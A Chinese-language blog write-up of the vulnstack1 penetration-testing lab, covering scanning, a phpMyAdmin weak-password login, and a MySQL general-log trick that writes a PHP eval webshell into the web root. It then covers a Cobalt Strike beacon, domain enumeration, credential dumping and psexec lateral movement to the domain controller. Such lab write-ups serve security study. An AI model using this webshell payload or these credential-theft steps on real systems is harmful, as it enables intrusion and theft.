vulnstack1

环境搭建

拓扑图

VMWARE 网卡配置

VMnet3 作为外网WEB服务器与KALI攻击机的网卡

VMnet2 作为外网WEB服务器与域主机的网卡

这里由于WEB服务器需要让客户访问并且需要与内网主机进行通信所以需要配置俩个网卡。

各个主机IP

  • 攻击机: Kali
    • IP : 192.168.33.130
  • Web服务器: Windows7
    • IP : 192.168.33.129(外网)
    • IP : 192.168.52.143 (内网)
    • 主机名: stu1
  • 域成员: Windows Server 2003
    • IP : 192.168.52.141
    • 主机名:root-tvi862ubeh
  • 域控: Windows Server 2008
    • IP : 192.168.52.138
    • 主机名:owa

开始前的操作

需要进入Windows7 找到phpstudy打开web服务。

外网渗透

信息收集

探测主机

1
2
3
4
5
6
7
┌── root@kali -> [/tmp] 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:29:88:93, IPv4: 192.168.33.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.33.1    00:50:56:c0:00:03       VMware, Inc.
192.168.33.129  00:0c:29:27:08:23       VMware, Inc.
192.168.33.254  00:50:56:f7:12:b7       VMware, Inc.

得到目标主机IP 192.168.33.129

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌── root@kali -> [~/tools] 
└─# ./fscan -h 192.168.33.129 -np

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 192.168.33.129:80
[+] 端口开放 192.168.33.129:445
[+] 端口开放 192.168.33.129:139
[+] 端口开放 192.168.33.129:135
[+] 端口开放 192.168.33.129:3306
[+] 存活端口数量: 5
[*] 开始漏洞扫描...
[!] 扫描错误 192.168.33.129:139 - netbios error
[*] NetInfo
[*] 192.168.33.129
   [->] stu1
   [->] 192.168.33.129
   [->] 192.168.52.143
   [->] 169.254.129.186
[+] MS17-010 192.168.33.129     (Windows 7 Professional 7601 Service Pack 1)
[*] 网站标题 http://192.168.33.129     状态码:200 长度:14749  标题:phpStudy 探针 2014
[!] 扫描错误 192.168.33.129:3306 - Error 1130: Host '192.168.33.130' is not allowed to connect to this MySQL server
[+] 扫描已完成: 5/5
[*] 扫描结束,耗时: 19.494685409s

扫出来了永恒之蓝,不过先来看看web服务。并且也有多个IP地址,有内网主机。

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌── root@kali -> [~/tools] 
└─# dirsearch -u http://192.168.33.129
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tools/reports/http_192.168.33.129/_25-04-24_21-17-35.txt

Target: http://192.168.33.129/

[21:17:36] Starting: 
[21:17:38] 403 -  215B  - /%C0%AE%C0%AE%C0%AF
[21:17:38] 403 -  211B  - /%3f/
[21:17:38] 403 -  210B  - /%ff
[21:17:40] 403 -  220B  - /.ht_wsr.txt
[21:17:40] 403 -  223B  - /.htaccess.orig
[21:17:40] 403 -  223B  - /.htaccess.save
[21:17:40] 403 -  224B  - /.htaccess_extra
[21:17:40] 403 -  221B  - /.htaccessBAK
[21:17:40] 403 -  223B  - /.htaccess.bak1
[21:17:40] 403 -  225B  - /.htaccess.sample
[21:17:40] 403 -  222B  - /.htaccessOLD2
[21:17:40] 403 -  213B  - /.htm
[21:17:40] 403 -  223B  - /.htaccess_orig
[21:17:40] 403 -  221B  - /.htaccessOLD
[21:17:40] 403 -  223B  - /.htpasswd_test
[21:17:40] 403 -  214B  - /.html
[21:17:40] 403 -  221B  - /.htaccess_sc
[21:17:40] 403 -  219B  - /.htpasswds
[21:17:40] 403 -  220B  - /.httr-oauth
[21:18:08] 403 -  225B  - /index.php::$DATA
[21:18:18] 200 -   71KB - /phpinfo.php
[21:18:18] 301 -  241B  - /phpmyadmin  ->  http://192.168.33.129/phpmyadmin/
[21:18:18] 301 -  241B  - /phpMyAdmin  ->  http://192.168.33.129/phpMyAdmin/
[21:18:19] 200 -    4KB - /phpmyAdmin/
[21:18:19] 200 -   32KB - /phpmyadmin/ChangeLog
[21:18:19] 200 -    4KB - /phpMyAdmin/
[21:18:19] 200 -    4KB - /phpMyadmin/
[21:18:19] 200 -    4KB - /phpmyadmin/
[21:18:19] 200 -    4KB - /phpmyadmin/index.php
[21:18:19] 200 -    4KB - /phpMyAdmin/index.php
[21:18:19] 200 -    2KB - /phpmyadmin/README
[21:18:31] 403 -  225B  - /Trace.axd::$DATA
[21:18:34] 403 -  226B  - /web.config::$DATA

GETSHELL

访问web,能够得到绝对路径C:/phpStudy/WWW

phpmyadmin,需要登录

弱口令直接进去root:root 。或者爆破。

进去后查看一下sql变量设置

查找能否getshell的点。

查找secure_file_priv参数,是否允许写入文件。

看来是null。那么试着写入日志,查看日志文件路径。

MySQL5.0版本以上会创建日志文件,通过修改日志的全局变量打开日志并指定日志保存路径,再通过查询写入一句话木马,此时该木马会被日志记录并生成日志文件,从而GetShell。但是前提是要对生成的日志文件有读写权限。

日志路径:C:\phpStudy\MySQL\data\stu1.log

但日志保存状态是OFF

需要打开它。执行sql语句即可。

1
2
3
set global general_log = "ON";
set global general_log_file="C://phpStudy/www/shell.php";
select "<?php eval($_POST[1]);?>";

改变日志保存状态以及保存路径为 web目录。并且执行查询语句将一句话木马保存到目标日志文件。

成功后访问蚁剑连接。

成功上马。

内网渗透

cs上线

cs前置

首先启动一下server端。

接着打开客户端连接

按照设置的 IP 与密码连接即可

创建Listener

左上角Cobalt Strike -> Listen -> Add

生成后门文件

选择监听器后生成

上传蚁剑执行

这里还有另外一个系统,但是我通过打下来后发现,其实并没有什么区别。最后再放这里的getshell吧。

然后执行后门文件。

成功上线,打开beacon

获取域内信息

查找域控

ipconfig /all

god.org且当前域为stu1.god.org

查找域内用户

net user /domain

域内用户:administrator , ligang , liukaifeng01

域内主机

net group "domain computers" /domain

域内有俩台主机(第一个不在)ROOT-TVI862UBEH[192.168.52.141] , STU1[192.168.52.143]

域控

net group "domain controllers" /domain

域控为:owa

  • 域控:owa
  • 域内用户:administrator , ligang , liukaifeng01
  • 域内主机:ROOT-TVI862UBEH[192.168.52.141] , STU1[192.168.52.143]
  • 域:god.org

横向

获取凭证

获取凭证即获取NTLM哈希,它是一个身份验证协议,在Windows中,NTLM存储在SAM数据库或NTDS.dit文件。如果获取到NTLM哈希可以尝试PTH攻击,哈希破解,中间人攻击等操作。

获取到NTLM。下一步进行内网探测。

内网探测

使用socks模块搭建隧道

到kali中使用proxychains

搭建好后,我选择使用fscan进行扫描。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
┌── root@kali -> [~/tools] 
└─# proxychains4 ./fscan -h 192.168.52.0/24 
[proxychains] config file found: /root/.proxychains/proxychains.conf
[proxychains] preloading /usr/local/lib/libproxychains4.so

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 192.168.52.0-192.168.52.255
[*] 已生成IP范围: 192.168.52.0 - 192.168.52.255
[*] 已解析CIDR 192.168.52.0/24 -> IP范围 192.168.52.0-192.168.52.255
[*] 最终有效主机数量: 256
[+] 目标 192.168.52.1    存活 (ICMP)
[+] 目标 192.168.52.138  存活 (ICMP)
[+] 目标 192.168.52.143  存活 (ICMP)
[+] 目标 192.168.52.141  存活 (ICMP)
[+] ICMP存活主机数量: 4
[*] 共解析 218 个有效端口
[+] 端口开放 192.168.52.141:8099
[+] 端口开放 192.168.52.141:8098
[+] 端口开放 192.168.52.143:80
[+] 端口开放 192.168.52.138:80
[+] 端口开放 192.168.52.141:21
[+] 端口开放 192.168.52.1:139
[+] 端口开放 192.168.52.1:3306
[+] 端口开放 192.168.52.1:445
[+] 端口开放 192.168.52.1:135
[+] 端口开放 192.168.52.141:445
[+] 端口开放 192.168.52.143:445
[+] 端口开放 192.168.52.138:445
[+] 端口开放 192.168.52.138:139
[+] 端口开放 192.168.52.143:3306
[+] 端口开放 192.168.52.141:135
[+] 端口开放 192.168.52.141:139
[+] 端口开放 192.168.52.143:135
[+] 端口开放 192.168.52.138:135
[+] 端口开放 192.168.52.143:139
[+] 端口开放 192.168.52.138:88
[+] 端口开放 192.168.52.141:7002
[+] 端口开放 192.168.52.141:7001
[+] 端口开放 192.168.52.1:7890
[+] 存活端口数量: 23
[*] 开始漏洞扫描...
[!] 扫描错误 192.168.52.1:3306 - Error 1130: Host 'cxcx' is not allowed to connect to this MySQL server
[!] 扫描错误 192.168.52.1:445 - read tcp 192.168.6.135:39408->192.168.52.1:445: read: connection reset by peer
[*] NetInfo
[*] 192.168.52.1
   [->] cxcx
   [->] 172.22.224.1
   [->] 192.168.111.1
   [->] 192.168.6.1
   [->] 192.168.56.1
   [->] 10.34.11.4
   [->] 198.18.0.1
   [->] 192.168.52.1
   [->] 192.168.33.1
[*] 网站标题 http://192.168.52.1:7890  状态码:400 长度:0      标题:无标题
[!] 扫描错误 192.168.52.1:7890 - Get "https://192.168.52.1:7890": EOF
[!] 扫描错误 192.168.52.143:139 - netbios error
[*] NetInfo
[*] 192.168.52.138
   [->] owa
   [->] 192.168.52.138
[!] 扫描错误 192.168.52.141:139 - netbios error
[*] NetInfo
[*] 192.168.52.141
   [->] root-tvi862ubeh
   [->] 192.168.52.141
[!] 扫描错误 192.168.52.138:88 - Get "http://192.168.52.138:88": read tcp 192.168.6.135:50074->192.168.52.138:88: read: connection reset by peer
[*] NetInfo
[*] 192.168.52.143
   [->] stu1
   [->] 192.168.33.129
   [->] 192.168.52.143
   [->] 169.254.129.186
[+] MS17-010 192.168.52.143     (Windows 7 Professional 7601 Service Pack 1)
[+] MS17-010 192.168.52.138     (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] NetBios 192.168.52.138  [+] DC:owa.god.org                   Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] 网站标题 http://192.168.52.141:7002 状态码:200 长度:2632   标题:Sentinel Keys License Monitor
[+] MS17-010 192.168.52.141     (Windows Server 2003 3790)
[*] 网站标题 http://192.168.52.138     状态码:200 长度:689    标题:IIS7
[+] ftp 192.168.52.141:21:anonymous 
[*] 网站标题 http://192.168.52.143     状态码:200 长度:14749  标题:phpStudy 探针 2014
[*] 网站标题 https://192.168.52.141:8098 状态码:401 长度:1656   标题:You are not authorized to view this page
[*] 网站标题 http://192.168.52.141:8099 状态码:403 长度:1409   标题:The page must be viewed over a secure channel
[!] 扫描错误 192.168.52.1:139 - netbios error
[!] 扫描错误 192.168.52.141:7001 - Get "http://192.168.52.141:7001": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[!] 扫描错误 192.168.52.143:3306 - Error 1130: Host '192.168.52.1' is not allowed to connect to this MySQL server
[+] 扫描已完成: 23/23
[*] 扫描结束,耗时: 53.495039221s

其中 域控owa: 192.168.52.138 ,域内成员 root-tvi862ubeh:192.168.52.141

并且都存在永恒之蓝漏洞。

CS上线域控

创建一个 SMB的监听器

通过logonpasswords获取到明文密码。

进行横向移动psexec

选择明文密码以及监听器,session选择一个正常的域内已控主机

接着就成功进行上线,域成员也是如此。

我这里多次执行了所以多了一些重复的。

第一次打内网,有些基础不牢,未来我会慢慢补充的。

靶机
#渗透 #内网
vulnstack1
https://r3bir7hcx.github.io/2025/04/24/vulnstack1/
Author
CXCX
Posted on
April 24, 2025
Licensed under